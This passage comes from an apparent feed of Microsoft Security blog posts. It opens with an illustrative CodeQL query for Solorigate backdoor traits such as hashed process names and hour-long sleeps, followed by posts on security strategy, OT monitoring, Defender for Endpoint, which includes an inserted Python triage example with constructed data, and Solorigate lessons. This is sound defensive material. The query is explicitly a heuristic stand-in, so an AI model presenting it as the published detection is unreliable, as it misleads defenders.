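 * Syntactic tactic: a string literal equal to a known IoC.
 * Placeholder value; the real literals come from the published queries.
 */
predicate syntacticIoc(StringLiteral lit) {
  lit.getValue() = "REPLACE_WITH_KNOWN_IOC_LITERAL"
}

/** A read of System.Diagnostics.Process.ProcessName. */
class ProcessNameRead extends PropertyAccess {
  ProcessNameRead() {
    this.getTarget().getName() = "ProcessName" and
    this.getTarget().getDeclaringType().getName() = "Process"
  }
}

/**
 * Semantic tactic 1: a process name flows (within one method) into a
 * call whose name suggests hashing. Assumed heuristic, not the real query.
 */
predicate processNameHashed(MethodCall hashCall) {
  hashCall.getTarget().getName().toLowerCase().matches("%hash%") and
  exists(ProcessNameRead name |
    DataFlow::localFlow(DataFlow::exprNode(name),
                        DataFlow::exprNode(hashCall.getAnArgument()))
  )
}

/**
 * Semantic tactic 2: Thread.Sleep with a literal delay of an hour or more.
 * The threshold is an assumption and will also match benign schedulers.
 */
predicate longSleep(MethodCall sleep) {
  sleep.getTarget().getName() = "Sleep" and
  sleep.getTarget().getDeclaringType().getName() = "Thread" and
  sleep.getArgument(0).(IntLiteral).getValue().toInt() >= 60 * 60 * 1000
}

from Expr e, string msg
where
  syntacticIoc(e) and msg = "String literal matches a known code-level IoC (syntactic)."
  or
  processNameHashed(e) and msg = "Process name flows into a hash computation (semantic)."
  or
  longSleep(e) and msg = "Long literal sleep before further activity (semantic)."
select e, msg
```

Running it against an aggregated set of CodeQL databases yields candidates only; as the post stresses, each finding must be reviewed before it is treated as actionable.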

Next steps with CodeQL

The queries we shared in this blog and described in target patterns specifically associated with the Solorigate code-level IoCs, but CodeQL also provides many other options to query for backdoor functionality and detection-evasion techniques.

These queries were relatively quick to author, and we were able to hunt for patterns much more accurately across our CodeQL databases and with far less effort to manually review the findings, compared to using text searches of source code. CodeQL is a powerful developer tool, and our hope is that this post inspires organizations to explore how it can be used to improve reactive security response and act as a compromise detection tool.

In future blog posts, we’ll share more ways that Microsoft uses CodeQL. We’ll also continue open-sourcing queries and utilities that build upon CodeQL so that others may benefit from them and further build upon them.

The post Microsoft open sources CodeQL queries used to hunt for Solorigate activity appeared first on Microsoft Security.

Becoming resilient by understanding cybersecurity risks: Part 3—a security pro’s perspective

Microsoft Malware Protection Center - Wed, 02/24/2021 - 12:00pm

In part two of this blog series on aligning security with business objectives and risk, we explored the importance of thinking and acting holistically, using the example of human-operated ransomware, which threatens every organization in every industry. As we exited 2020, the Solorigate attack highlighted how attackers are continuously evolving. These nation-state threat actors used an organization’s software supply chain against them, with the attackers compromising legitimate software and applications with malware that installed into target organizations.

In part three of this series, we will further explore what it takes for security leaders to pivot their program from looking at their mission as purely defending against technical attacks to one that focuses on protecting valuable business assets, data, and applications. This pivot will enable business and cybersecurity leaders to remain better aligned and more resilient to a broader spectrum of attack vectors and attacker motivations.

What problem do we face?

First, let’s set a quick baseline on the characteristics of human-operated cyberattacks.

This diagram depicts commonalities and differences between for-profit ransomware and espionage campaigns:

Figure 1: Comparison of human-operated attack campaigns.

Typically, the attackers are:

  • Flexible: Utilize more than one attack vector to gain entry to the network.
  • Objective driven: Achieve a defined purpose from accessing your environment. This could be specific to your people, data, or applications, but you may also just fit a class of targets like “a profitable company that is likely to pay to restore access to their data and systems.”
  • Stealthy: Take precautions to remove evidence or obfuscate their tracks (though at different investment and priority levels; see figure 1).
  • Patient: Take time to perform reconnaissance to understand the infrastructure and business environment.
  • Well-resourced and skilled in the technologies they are targeting (though the depth of skill can vary).
  • Experienced: They use established techniques and tools to gain elevated privileges to access or control different aspects of the estate (which grants them the privileges they need to fulfill their objective).

There are variations in the attack style depending on the motivation and objective, but the core methodology is the same. In some ways, this is analogous to the difference between a modern electric car versus a “Mad Max” style vehicle assembled from whatever spare parts were readily and cheaply available.

What to do about it?

Because human attackers are adaptable, a static technology-focused strategy won’t provide the flexibility and agility you need to keep up with (and get ahead of) these attacks. Historically, cybersecurity has tended to focus on the infrastructure, networks, and devices—without necessarily understanding how these technical elements correlate to business objectives and risk.

By understanding the value of information as a business asset, we can take concerted action to prevent compromise and limit risk exposure. Take email, for example, every employee in the company typically uses it, and the majority of communications have limited value to attackers. However, it also contains potentially highly sensitive and legally privileged information (which is why email is often the ultimate target of many sophisticated attacks). Categorizing email through only a technical lens would incorrectly categorize email as either a high-value asset (correct for those few very important items, but impossible to scale) or a low-value asset (correct for most items, but misses the “crown” jewels in email).

Figure 2: Business-centric security.

Security leaders must step back from the technical lens, learn what assets and data are important to business leaders, and prioritize how teams spend their time, attention, and budget through the lens of business importance. The technical lens will be re-applied as the security, and IT teams work through solutions, but looking at this only as a technology problem runs a high risk of solving the wrong problems.

It is a journey to fully understand how business value translates to technical assets, but it’s critical to get started and make this a top priority to end the eternal game of ‘whack-a-mole’ that security plays today.

Security leaders should focus on enabling this transformation by:

  1. Aligning the business in a two-way relationship:
  • Communicate in their language: explain security threats in business-friendly language and terminology that helps to quantify the risk and impact to the overall business strategy and mission.
  • Participate in active listening and learning: talk to people across the business to understand the important business services and information and the impact if those were compromised or breached. This will provide clear insight into prioritizing the investment in policies, standards, training, and security controls.
  2. Translating learnings about business priorities and risks into concrete and sustainable actions:
  • Short term: focus on dealing with burning priorities:
    • Protecting critical assets and high-value information with appropriate security controls (that increase security while enabling business productivity).
    • Focusing on immediate and emerging threats that are most likely to cause business impact.
    • Monitoring changes in business strategies and initiatives to stay in alignment.
  • Long term: set direction and priorities to make steady progress over time and improve overall security posture:
    • Zero Trust: Create a clear vision, strategy, plan, and architecture for reducing risks in your organization aligned to the Zero Trust principles of assuming breach, least privilege, and explicit verification. Adopting these principles shifts from static controls to more dynamic risk-based decisions that are based on real-time detections of anomalous behavior irrespective of where the threat originated.
    • Burn down technical debt as a consistent strategy by operating security best practices across the organization, such as replacing password-based authentication with passwordless and multi-factor authentication (MFA), applying security patches, and retiring (or isolating) legacy systems. Just like paying off a mortgage, you need to make steady payments to realize the full benefit and value of your investments.
    • Apply data classifications, sensitivity labels, and role-based access controls to protect data from loss or compromise throughout its lifecycle. While these can’t completely capture the dynamic nature and richness of business context and insight, they are key enablers to guide information protection and governance, limiting the potential impact of an attack.
  3. Establishing a healthy security culture by explicitly practicing, communicating, and publicly modeling the right behavior. The culture should focus on open collaboration between business, IT, and security colleagues and applying a ‘growth mindset’ of continuous learning. Culture changes should be focused on removing silos between security, IT, and the larger business organization to achieve greater knowledge sharing and resilience.

You can read more on Microsoft’s recommendations for security strategy and culture here.

In the next blog of the series, we will explore the most common attack vectors, how and why they work so effectively, and the strategies to mitigate evolving cybersecurity threats.

To learn more about Microsoft Security solutions visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

The post Becoming resilient by understanding cybersecurity risks: Part 3—a security pro’s perspective appeared first on Microsoft Security.

Microsoft listed as a Representative Vendor in 2020 Gartner Market Guide for Insider Risk Management Solutions

Microsoft Malware Protection Center - Tue, 02/23/2021 - 12:00pm

While organizations have long prioritized external cybersecurity risks, many have not paid enough attention to the risks posed by trusted insiders in their organizations. This is a mistake. Insiders often already have access to sensitive data, and the risks, whether malicious or inadvertent, can potentially cause greater damage than external cybersecurity risks.

Two years ago, after a conversation with our Chief Information Security Officer (CISO), Bret Arsenault, we embarked upon an incredible journey developing Insider Risk Management in Microsoft 365, which organizations could use to identify and manage insider risks.

In recognition of these investments, I am announcing that Gartner has listed Microsoft as a Representative Vendor in the 2020 Market Guide for Insider Risk Management Solutions. To us, this recognition reinforces our leadership in delivering an innovative solution that allows organizations to quickly identify and collaboratively manage insider risks while maintaining employee privacy.

According to Gartner, “security and risk management leaders need an insider threat mitigation program that is composed of people, processes and technology.”

A few learnings from the report:
  • The number of incidents has increased by a staggering 47 percent in just two years, from 3,200 in 2018 to 4,700 in 2020.
  • Organizations impacted by insider threats spent an average of $11.45 million in 2020—up 31 percent from $8.76 million in 2018.
  • More than 60 percent of reported insider threat incidents were the result of a careless employee or contractor, and 23 percent were caused by malicious insiders.

We continue to work closely with our customers to gather feedback to help us build better products. Your input provides critical insights as we strive to enrich our Insider Risk Management solution to help you on your journey in identifying and managing insider risks.

For more details about our information archiving solution, visit our website. To learn more about Microsoft Security solutions visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

Gartner, Market Guide for Insider Risk Management Solutions, 29 December 2020, Jonathan Care, Brent Predovich, Paul Furtado.

Gartner does not endorse any vendor, product, or service depicted in its research publications, and does not advise technology users to select only those vendors with the highest ratings or other designation. Gartner research publications consist of the opinions of Gartner’s research organization and should not be construed as statements of fact. Gartner disclaims all warranties, expressed or implied, with respect to this research, including any warranties of merchantability or fitness for a particular purpose.

The post Microsoft listed as a Representative Vendor in 2020 Gartner Market Guide for Insider Risk Management Solutions appeared first on Microsoft Security.

Securing Azure datacenters with continuous IoT/OT monitoring

Microsoft Malware Protection Center - Mon, 02/22/2021 - 2:00pm

Figure 1: Industrial cooling system for datacenters.

As more intelligent devices and machinery become connected to the internet, Operational Technology (OT) and the Internet of Things (IoT) have become part of your enterprise network infrastructure—and a growing security risk. With every new factory sensor, wind turbine monitoring device, or smart building, the attack surface grows. Analysts estimate that there will be 37 billion industrial IoT (IIoT) devices by 2025. Even more alarming for business leaders, Gartner predicts that 75 percent of CEOs will be personally liable for cyber-physical incidents by 2024.

We’ve spent 15 to 20 years adding layers of telemetry and monitoring for IT security. However, most chief information security officers (CISOs) and security operations center (SOC) teams have little or no visibility into their OT risk. It’s clear that a new approach is needed, one that includes IoT and OT-specific incident response and best practices for bringing the two teams together to defend against increasingly sophisticated cyber threats.

A changing threat landscape

In every area of our lives, cyber-physical systems (CPS) go mostly unseen as they quietly monitor building automation, industrial robots, gas pipelines, HVAC systems, turbines, automated warehousing and logistics systems, and other industrial systems. In the past, OT risk was minimized because of “air-gapping,” meaning a physical divide was maintained between OT and IT networks. But digital transformation has disrupted all that. Now devices in the warehouse, refinery, and factory floor are connected directly to corporate IT networks and often to the internet.

Microsoft offers end-to-end IoT security solutions for new, or “greenfield,” IoT deployments, but most of today’s IoT and OT devices are still considered “unmanaged” because they’re not provisioned, tracked in a configuration management database (CMDB), or consistently monitored. These devices typically don’t support agents and lack built-in security such as strong credentials and automated patching—making them soft targets for adversaries looking to pivot deeper into corporate networks.

For OT security, the key priorities are safety and availability. Production facilities need to be up and running to keep generating revenue. However, beyond revenue losses, there’s a risk for catastrophic damage and possible loss of life when OT systems are breached. And like IT attacks, an OT breach also poses a risk for theft of intellectual property (IP). According to the Verizon Data Breach Investigations Report (DBIR), manufacturers are eight times more likely to be breached for theft of IP. OT security translates directly into three main types of business risks:

  • Revenue impact: In 2017, WannaCry malware shut down major automotive manufacturers and affected more than 200,000 computers across 150 countries, with damages ranging into billions of dollars. The same year, NotPetya ransomware nearly shut down the mighty Maersk shipping company and several CPG companies. The attack crippled Merck’s production facilities resulting in losses of $1.3 billion. Last year, LockerGoga shut down the systems of Norwegian aluminum manufacturing company Norsk Hydro and several other plants. In 2020, Ekans (snake spelled backward) ransomware became the latest OT threat by specifically shutting down industrial control systems (ICS).
  • IP theft: IP includes proprietary manufacturing processes, formulas, designs, and more. In one instance, Microsoft Security Response Center (MSRC) discovered hackers were compromising vulnerable IoT devices using their default credentials. Once inside, the hackers scanned the network to see what other systems they could access to get sensitive IP. One in five North American-based corporations reports that they have had IP stolen within the last year.
  • Safety risks: The Triton attack on a petrochemical facility targeted safety controllers with the intent to cause major structural damage and possible loss of life. The attackers gained a foothold in the IT network then used living-off-the-land (LOTL) tactics to gain remote access to the OT network, where they deployed their purpose-built malware. As this attack demonstrated, increased connectivity between IT and OT networks gives adversaries new avenues of attack for compromising unmanaged OT devices.

The U.S. Cybersecurity and Infrastructure Agency (CISA) reports that adversaries are still using many of the tactics seen in the Triton cyberattack to compromise embedded devices in OT systems. CISA has issued three basic recommendations for securing OT:

  1. Create an up-to-date, detailed inventory and map of your OT network.
  2. Use the asset inventory or map to prioritize risks, such as unpatched systems, unauthorized connections between subnets, or unauthorized connections to the internet.
  3. Implement continuous monitoring with anomaly detection.

Azure datacenters—a strategic resource

Through our cloud, Microsoft serves more than a billion customers and more than 20 million businesses across 60 regions worldwide. Today we help secure more than 400,000 customers across 120 countries. These range from small businesses to large enterprises, with 90 of the Fortune 100 using four or more of our security, compliance, identity, and management solutions. Our SOCs process 8 trillion global signals daily. Datacenters are the building blocks of the Cloud, and Microsoft has been building datacenters for more than 30 years. Microsoft datacenters constitute a complex industrial-scale facility sitting at the intersection of operational technologies (OT) and information technologies (IT). This includes industrial control systems managing the climate, power and water, physical security systems, diverse MS and non-MS personnel managing the servers and equipment, various networks including LAN and WAN and WiFi, and diverse software tools. Exclusively leveraging IT security solutions is insufficient to secure datacenters because OT systems have a long lifespan, implement network segregation, rely on proprietary protocols, and patching can disrupt operations leading to safety risks.

Figure 2: Microsoft datacenters.

The biggest risks in securing complex, heterogeneous datacenter environments and generations are a lack of visibility into the full datacenter stack and a lack of IR plans and playbooks spanning OT and IT. To address this, we have implemented an end-to-end security monitoring system using Azure Defender for IoT and Azure Sentinel while integrating with Microsoft’s central SOC.

To strengthen its data centers’ operational resiliency worldwide, Microsoft’s Azure data center security team selected CyberX’s purpose-built IoT and OT cybersecurity platform in mid-2019. Microsoft subsequently acquired CyberX in June 2020 and recently released Azure Defender for IoT, which is based on CyberX’s agentless security platform.

Incorporating IoT and OT-aware behavioral analytics and threat intelligence, Azure Defender for IoT delivers continuous IoT and OT asset discovery, vulnerability management, and threat detection. As a Network Detection and Response (NDR) platform that uses passive monitoring and Network Traffic Analysis (NTA), it has zero performance impact on the OT network.

Azure Defender for IoT is now deeply integrated with Azure Sentinel and is available for on-premises, Azure-connected, and hybrid environments. By using both Azure Defender for IoT and Azure Sentinel as a unified, end-to-end IT and OT security solution, the Azure datacenter security team has been able to reduce complexity and prevent gaps that can lead to vulnerabilities.

Figure 3: Microsoft datacenters: Ingestion, detection, and investigation.

How it works

Azure Sentinel processes alerts from both IT and OT, including alerts from Azure Defender for IoT for OT devices such as HMIs, PLCs, biometrics, and badge readers, and for IT devices such as physical hosts, firewalls, virtual machines, routers, and more. All information is integrated with our incident-response system and our central SOC (including OT and IT playbooks), where machine learning reduces false positives and makes our alerts richer—creating a feedback loop with Azure Sentinel, which further refines and improves our alerting capabilities.

Microsoft datacenter security monitoring and response:

  • Improves the quality of critical environment inventory for risk-based analysis.
  • Correlates significant security events across multiple sources.
  • Advances detections across industrial control system (ICS) networks for known malware, botnet, and command/control traffic.
  • Enables machine learning support for insider threat-detection via user and entity behavior analytics (UEBA).
  • Deploys OT and IT incident-response playbooks using Azure Logic Apps integrated with Microsoft SOC. For example, we implement OT and IT playbooks for scenarios like ransomware or malware, botnet, insider threat, and untracked data-bearing devices.
  • Detects anomalous activity while reducing noise.

In addition, the Microsoft Threat Intel Center (MSTIC), part of the Microsoft cloud security stack, is being expanded with OT capabilities and threat intel.

OT and IT: Bridging the cultural divide

OT and IT have traditionally worked on separate sides of the air gap as laid out in the Purdue Model. But as I mentioned at the top, that physical divide has vanished into the cloud. Thinking in terms of an IT and OT persona that enables both teams to collaborate seamlessly is the security challenge for our time. Here are a few insights that can help bridge the gap:

  • Mature and boost IT security practices for OT: Patching an OT system isn’t the same as updating IT; there can be dangerous repercussions in the form of factory downtime or safety risks. Empathy is important; the liberties enjoyed in the IT world can’t be blindly applied on OT. However, don’t throw away IT security best practices—boost them with OT capabilities.
  • Embrace the security journey: Whether you’re in OT or IT, security improvements move like a dial, not a switch. Agree on your guiding principles and tenets, then constantly improve collaboration between OT and IT teams.
  • Understand the OT persona: IT teams should get to know what a day in the life of an OT person looks like. Our team shadowed OT activity by making site visits, which helped build understanding and establish working relationships.
  • Appreciate the other team’s priorities: When working with OT, this means understanding the importance of safety and availability. What might be a simple system patch in IT could cause downtime or a safety issue in OT. Establish a common vocabulary and metrics to work out issues together.
  • Acknowledge preconceptions: OT often feels like the IT security approach will cause disruptions and downtime, leading to audits, escalations, or worse. For that reason, our approach became: “Hey, we found a problem. Let’s solve it together.”
  • Be proactive versus reactive: Do security assessments together and keep the right people in the loop. Set up two-way trainings, such as joint tabletop or red team exercises, and plan for “worst day” scenarios. Create dedicated websites and SharePoint sites where people can reach out with confidence that their concerns will be addressed.

For more information on securing smart buildings and bridging the IT and OT gap, watch my SANS webinar presentation titled “Securing Building Automation & Data Centers with Continuous OT Security Monitoring.”

Learn more

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

The post Securing Azure datacenters with continuous IoT/OT monitoring appeared first on Microsoft Security.

What we like about Microsoft Defender for Endpoint

Microsoft Malware Protection Center - Mon, 02/22/2021 - 12:00pm

This blog post is part of the Microsoft Intelligent Security Association guest blog series. Learn more about MISA 

It’s no secret that the security industry generally likes Microsoft Defender for Endpoint. After a few months of using and integrating it with our platform here at Expel, we feel the same.

On Expel’s EXE Blog, we regularly share our thought process on how we think about security operations at scale at Expel and the decision support (or additional context) we provide our analysts through automation.

In short, Defender for Endpoint makes it easy for us to achieve our standard of investigative quality and response time, but it doesn’t require a heavy lift from our analysts. And that’s good news both for our customers and for us.

So, what is Microsoft Defender for Endpoint?

Defender for Endpoint is an enterprise endpoint security product that supports Mac, Linux, and Windows operating systems, along with Android and iOS. There are lots of cool things that Defender for Endpoint does at an administrative level (such as attack surface reduction and configurable remediation). However, from our vantage point, we know it best for its detection and response capabilities.

Defender for Endpoint is unique because not only does it combine an Endpoint Detection and Response (EDR) and AV detection engine into the same product, but for Windows 10 hosts, this functionality is built into the operating system, removing the need to install an endpoint agent.

With an appropriate Microsoft license, Defender for Endpoint and Windows 10 provide out-of-the-box protection without the need to mass-deploy software or provision sensors across your fleet.

How EDR tools help us as an XDR vendor

When we integrate with an EDR product like Defender for Endpoint in support of our customers, our goal is to predict the investigative questions that an analyst will ask and then automate the action of getting the necessary data from that tool.

This frees up our analysts to make the decision—versus making them spend time extracting the right data.

We think Defender for Endpoint provides the right toolset that helps us reach that goal—and removes some burden from our analysts—thanks to its APIs.

Thanks to Defender for Endpoint’s robust APIs, we augmented its capability to provide upfront decision support to our analysts. As a result, we’re able to arm them with the answers to the basic investigative questions we ask ourselves with every alert.

To find these answers, there are a few specific capabilities of Defender for Endpoint we use that allow us to pull this information into each alert:

  • Advanced hunting database.
  • Prevalence information.
  • Detailed process logging.
  • AV actions.

This way, our analysts don’t need to worry about fiddling with the tool but instead focus on analyzing the rich data it provides.
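The four capabilities above map directly onto the questions an analyst asks about an alert: what process chain led here, how widespread is this file, and has AV already acted on it. The following is an added example, not Expel’s or Microsoft’s code, of what that upfront decision support looks like once the rows an EDR exposes through its API have been pulled into memory. The fleet size, the process events, the AV actions, the alert and the field names are all constructed sample data and do not follow any vendor’s schema.

```python
"""Decision-support enrichment for an endpoint alert.

Added example, not Expel's or Microsoft's code. It assumes the rows an
EDR exposes through its API (process-creation events, per-hash prevalence,
AV actions) have already been fetched into the plain Python lists below;
the events, the fleet size and the alert are constructed sample data, and
the field names are ours, not any vendor's schema.
"""

FLEET_SIZE = 3  # constructed: number of onboarded hosts

# Constructed process-creation events. The "sha256" values are placeholders.
PROCESS_EVENTS = [
    {"host": "ws-01", "pid": 400, "ppid": 300, "name": "explorer.exe",   "sha256": "hash-explorer"},
    {"host": "ws-01", "pid": 520, "ppid": 400, "name": "winword.exe",    "sha256": "hash-winword"},
    {"host": "ws-01", "pid": 610, "ppid": 520, "name": "powershell.exe", "sha256": "hash-ps-dropper"},
    {"host": "ws-02", "pid": 410, "ppid": 300, "name": "explorer.exe",   "sha256": "hash-explorer"},
    {"host": "ws-03", "pid": 420, "ppid": 300, "name": "explorer.exe",   "sha256": "hash-explorer"},
    {"host": "ws-03", "pid": 530, "ppid": 420, "name": "winword.exe",    "sha256": "hash-winword"},
]

# Constructed AV actions reported for the same fleet.
AV_ACTIONS = [
    {"host": "ws-01", "sha256": "hash-ps-dropper", "action": "quarantined"},
]

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}


def prevalence(sha256, events=PROCESS_EVENTS, fleet_size=FLEET_SIZE):
    """How many distinct hosts have run this hash, and what fraction of the fleet that is."""
    hosts = {e["host"] for e in events if e["sha256"] == sha256}
    return {"hosts": len(hosts), "fleet_fraction": len(hosts) / fleet_size}


def process_chain(host, pid, events=PROCESS_EVENTS):
    """Walk parent pointers from the alerted process to the root; returns image names root-first."""
    by_key = {(e["host"], e["pid"]): e for e in events}
    chain, seen = [], set()
    key = (host, pid)
    while key in by_key and key not in seen:  # 'seen' guards against a pid-reuse cycle
        seen.add(key)
        event = by_key[key]
        chain.append(event["name"])
        key = (host, event["ppid"])
    return list(reversed(chain))


def av_action(host, sha256, actions=AV_ACTIONS):
    """Return the AV verdict already applied to this hash on this host, or None."""
    for a in actions:
        if a["host"] == host and a["sha256"] == sha256:
            return a["action"]
    return None


def enrich(alert):
    """Answer the standard triage questions up front so the analyst only has to decide."""
    chain = process_chain(alert["host"], alert["pid"])
    prev = prevalence(alert["sha256"])
    action = av_action(alert["host"], alert["sha256"])
    notes = []
    if prev["hosts"] <= 1:
        notes.append("hash seen on a single host (low prevalence)")
    if len(chain) >= 2 and chain[-2] in OFFICE_APPS:
        notes.append(f"spawned by an Office application ({chain[-2]})")
    if action:
        notes.append(f"AV already took action: {action}")
    return {
        "process_chain": chain,
        "prevalence_hosts": prev["hosts"],
        "fleet_fraction": prev["fleet_fraction"],
        "av_action": action,
        "notes": notes,
    }


if __name__ == "__main__":
    # Constructed alert: a PowerShell process on ws-01 flagged by a detection rule.
    print(enrich({"host": "ws-01", "pid": 610, "sha256": "hash-ps-dropper"}))
```

The analyst receives the chain (explorer.exe → winword.exe → powershell.exe), a prevalence of one host out of three, and the fact that AV already quarantined the file, without opening the console; the `notes` list is the decision support, the raw fields are there for verification.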

Check out a real-life example of how Expel analysts use Defender for Endpoint to triage an alert on behalf of a customer.

Defender for Endpoint helps reduce our alert-to-fix time

The decision support—or additional context about an alert—that Defender for Endpoint enables us to generate is powerful because it allows us to become specialists at analysis rather than specialists of a specific technology.

Defender for Endpoint provides a platform that allows our analysts to quickly and accurately answer important questions during an investigation.

Most importantly, though, having these capabilities exposed through the API allowed us to build on top of the Defender for Endpoint platform to be more efficient in providing high-quality detection and response.

And that’s a win-win for both Expel and our customers.

Learn more

To learn more about Expel, visit our listing on the Azure Marketplace.

To learn more about the Microsoft Intelligent Security Association (MISA), visit our website, where you can learn about the MISA program, product integrations and find MISA members. Visit the video playlist to learn about the strength of member integrations with Microsoft products.

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

The post What we like about Microsoft Defender for Endpoint appeared first on Microsoft Security.

Forrester Consulting TEI Study: Azure Security Center delivers 219 percent ROI over 3 years and a payback of less than 6 months

Microsoft Malware Protection Center - Thu, 02/18/2021 - 12:00pm

Azure Security Center is a critical tool to secure our multi-cloud workloads in the new world of remote work we find ourselves in today. We are excited to share that Forrester Consulting has just conducted a commissioned Total Economic Impact (TEI) study on behalf of Microsoft, which involved interviewing existing customers to create an accessible framework for organizations to evaluate the financial impact of Azure Security Center. The results are big—Azure Security Center delivers 219 percent return on investment (ROI) over three years and a payback of less than six months; reduces the risk of a cloud security breach by up to 25 percent, reduces time to threat mitigation by 50 percent, and reduces the cost of third-party security tools and services from consolidation by over $200,000 annually.

The Forrester study concluded that Azure Security Center reduces threat protection costs at scale, simplifies security posture management, and improves the efficiency and effectiveness of the Security Operations Center (SOC).

Forrester found that a composite organization experienced benefits of $3.56 million over three years versus costs of $1.1 million. This adds up to an ROI of 219 percent with payback in less than six months.

Cost Savings

Prior to using Azure Security Center, the customers were relying on multiple third-party cloud security tools implemented in different organizational silos to understand their security posture and defend against potential threats. However, the distributed and fragmented nature of this approach introduced inefficiencies into security workflows, produced a plethora of false-positive threat alerts, and limited visibility of the organization’s overall security posture, leading to potential security risk.

After the investment in Azure Security Center, the customers’ visibility into the security posture of their Azure workloads increased substantially, reducing the risk of cloud security breaches while also improving the productivity of security teams responsible for threat detection and remediation and security policy and regulatory compliance.

“We thought that if we could replace third-party tools with integrated Azure functionality, it might improve visibility. It might catch additional threats. It might ease configuration work, reducing management overhead in the end.”—IT security manager, professional services ¹

Reducing risk factors and time to respond

Forrester interviewed four customers with experience using Azure Security Center and combined their experiences into a single composite organization. This framework helps identify the cost, benefit, flexibility, and risk factors that affect the investment decision. According to the aggregated data, Azure Security Center demonstrated strong benefits such as:

  • Reduced risk of a cloud security breach by up to 25 percent. By improving visibility into an organization’s security posture across all its Azure workloads and decreasing time to threat remediation, interviewed organizations shared that they were able to reduce the risk of cloud security breaches.
  • Reduced time to threat mitigation by 50 percent. Organizations that chose to also deploy Azure Defender within Azure Security Center shared that they were able to decrease their mean time to threat remediation by 50 percent. They were also able to reduce the number of threats needing remediation by 86 percent, thanks to false-positive threat alert reduction. Customers also benefitted from the fact that Microsoft’s scale and telemetry data enables Azure Security Center to update security recommendations and notify of important threats at speed.
  • Reduced time spent on security policy and compliance management by up to 30 percent. Azure Security Center also reduced the amount of time spent on updating security policies and on compliance-related workflows by between 20 percent and 30 percent. This resulted in the improved productivity of security administrators.
  • Reduced cost of third-party security tools and services from consolidation by over $200,000 annually. Customers shared that they reduced their spending and reliance on third-party security tools and services. Customers saved 20 percent to 30 percent on third-party security tools, reduced third-party security services by $180,000, and reduced third-party penetration test services by 50 percent.
  • Reduced risk of non-compliance. Customers improved their compliance posture with the added visibility and accessibility of regulatory compliance status through Azure Security Center. They were also able to make recommended fixes to improve compliance they might have otherwise missed.

“Whenever we got a vulnerability report, we’d have a hard time hunting down who was responsible to make sure they would remediate the issue. With Azure Security Center, our teams have full visibility into vulnerabilities, and the recommendations that are applicable to them.”—Cloud Security Specialist, Retail ¹

Protect your hybrid cloud workloads today

You can start monitoring your security posture for free using Azure Security Center today. Microsoft recommends protecting all your hybrid cloud workloads with Azure Defender. You can try Azure Defender free for 30 days. Then pay as you go for the workload protection you choose.

Download the full Forrester Consulting study, The Total Economic Impact of Azure Security Center. Get started and learn more about Azure Security Center and Azure Defender. To develop a proof of concept study, please visit our POC guide.

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

¹ Customer quotes shared in this blog are anonymous as they are part of the Forrester Consulting Total Economic Impact of Azure Security Center study.

The post Forrester Consulting TEI Study: Azure Security Center delivers 219 percent ROI over 3 years and a payback of less than 6 months appeared first on Microsoft Security.

Turning the page on Solorigate and opening the next chapter for the security community

Microsoft Malware Protection Center - Thu, 02/18/2021 - 11:00am

The recent SolarWinds attack is a moment of reckoning. Today, as we close our own internal investigation of the incident, we continue to see an urgent opportunity for defenders everywhere to unify and protect the world in a more concerted way. We also see an opportunity for every company to adopt a Zero Trust plan to help defend against future attacks.

The Microsoft Security Response Center (MSRC), which has shared learnings and guidance throughout the Solorigate incident, confirmed today that, following the completion of our internal investigation, we have seen no evidence that Microsoft systems were used to attack others. There was also no evidence of access to our production services or customer data.

However, a concerning aspect of this attack is that security companies were a clear target. Microsoft, given the expansive use of our productivity tools and our leadership in security, was of course an early target.

But while this highly sophisticated nation-state actor was able to breach the gate, they were met by a unified team of human and digital defenders. There are several reasons why we were able to limit the scope and impact of this incident for our company, customers, and partners, but ultimately they all boil down to a few fundamental ways we approach security.

We believe these approaches represent an opportunity for all IT and security teams as we collectively navigate a rapidly evolving and sophisticated threat landscape.  

Adopt a Zero Trust mindset

A key action is implementing a Zero Trust architecture. In this approach, companies must assume all activity—even by trusted users—could be an attempt to breach systems, and everything a company does should be designed around that assumption.  

To guard against these pervasive threats, it’s recommended that organizations deploy zero-trust architecture and defense-in-depth protections, installing defenses like a layer cake across code, coding tools, email, cloud apps, endpoints, identities, the developer community, defender products—everything. 

Zero Trust is a proactive mindset. When every employee at a company assumes attackers are going to land at some point, they model threats and implement mitigations to ensure that any potential exploit can’t expand. The value of defense-in-depth is that security is built into key areas an actor might try to break, beginning at the code level and extending to all systems in an end-to-end way.  

Customer Guidance: As companies think about deploying a zero-trust posture and making a transition from implicit trust to explicit verification, the first step to consider is protecting identities, especially privileged user accounts. Gaps in protecting identities (or user credentials), like weak passwords or lack of multifactor authentication, are opportunities for an actor to find their way into a system, elevate their privileges, and move laterally across the environment targeting email, source code, critical databases, and more. We witnessed this in Solorigate when abandoned app accounts with no multifactor authentication were used to access cloud administrative settings with high privilege. To explore protecting privileged identity and access, companies should review the Securing privileged access overview on Microsoft Docs.

Embrace the cloud

We were also reminded of the importance of cloud technology over on-premises software. Cloud technologies like Microsoft 365, Azure, and the additional premium layers of services available as part of these solutions, improve a defender’s ability to protect their own environment.  

Baseline layers of protection are not enough for today’s sophisticated threats. Defense strategies must match up to these increasingly sophisticated attacks while factoring in the complexities of securing a remote workforce. If you are not thinking about advanced layers of protection that can detect, alert, prevent, and respond to attacks across identities, email, cloud apps, and endpoints, you may be locking a door while leaving the window open. From Microsoft, consider technologies like Azure Active Directory and Microsoft 365 Defender.

One of the most important pieces of guidance for any security posture that we can share right now is to layer up, no matter who your security vendors are. 

In addition, with the Microsoft cloud, customers benefit from industry-leading threat intelligence, powerful AI, machine learning, and defense-in-depth capabilities that most companies simply could not develop on their own. Our platform and services assess over eight trillion security signals every day, enabling Microsoft to take more of the work off a defender’s plate. Our technology can surface and correlate security alerts that could represent a larger issue or remediate issues on demand with our own threat experts. As an example, in 2020 over 30 billion email threats were blocked by Microsoft cloud technology. 

